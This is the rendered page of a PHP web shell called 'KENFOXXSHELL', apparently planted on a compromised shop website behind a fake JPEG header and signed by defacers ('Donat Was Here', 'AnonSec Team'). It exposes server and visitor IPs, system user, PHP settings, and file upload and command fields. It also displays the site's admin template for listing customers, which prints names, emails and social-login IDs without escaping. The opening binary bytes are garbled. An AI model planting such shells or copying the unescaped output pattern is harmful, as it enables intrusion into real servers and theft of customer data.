ÿØÿàJFIFHHÿÛC     ÿÛC  ÿÂ"ÿÄÿÄÿÚ ±5¬€ÿÄàÿÚÿÄÀÿÚ?ÿÄÀÿÚ?ÿÄàÿÚ?ÿÄàÿÚ?!ÿÚ ÿÄÀÿÚ?ÿÄÀÿÚ?ÿÄàÿÚ?ÿÙ Donat Was Here
KENFOXXSHELL
Server IP : 160.25.81.117  /  Your IP : 216.73.216.137
Web Server : Apache/2
System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : bellizen ( 1045)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/bellizen/domains/bellizeno.com/public_html/resources/views/admin/users/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/bellizen/domains/bellizeno.com/public_html/resources/views/admin/users/khach.blade.php
@extends('admin.master')

@section('content')

<!-- Content Header (Page header) -->



<section class="content-header">



  <h1>



  

    <small>Tài khoản</small>



  </h1>



  <ol class="breadcrumb">



    <li><a href="admin"><i class="fa fa-dashboard"></i> Home</a></li>



    <li><a href="javascript:">Tài khoản khách hàng</a></li>



   

  </ol>



</section>









<!-- Main content -->



<section class="content">



  <div class="row">



    <div class="col-xs-12">



      <div class="box">



        @include('admin.messages_error')



        <!--<div class="box-header">



          <h3 class="box-title">Data Table With Full Features</h3>



        </div>-->



        <div class="box-body">



          <table id="example1" class="table table-bordered table-hover">



            <thead>



              <tr>



                <th class="text-center with_dieuhuong">Stt</th>



                <th>Tên</th>



                <th>Email</th>

                <th>ID facebook</th>
                <th>ID Google</th>


              </tr>



            </thead>



            <tbody>

                     @foreach($data as $k=>$item)

                      

    		      	<tr class="action-number">

    		      		<td class="">{{$k+1}}</td>

    		      	    <td class="text-center">{!! $item->name !!}</td>

    		      		<td class="text-center">{!! $item->email !!}</td>

                        <td class="text-center">{!! $item->id_facebook !!}</td>
                        <td class="text-center">{!! $item->google_id !!}</td>
    		      	 

    		      	

                      </tr>

                   

    		        @endforeach



            </tbody>



          </table>



         {{ $data->links() }}



        </div><!-- /.box-body -->







      </div><!-- /.box -->



    </div><!-- /.col -->



  </div><!-- /.row -->



</section><!-- /.content -->



<!------------------------------------------------------------------------->  

     

@endsection()

Anon7 - 2022
AnonSec Team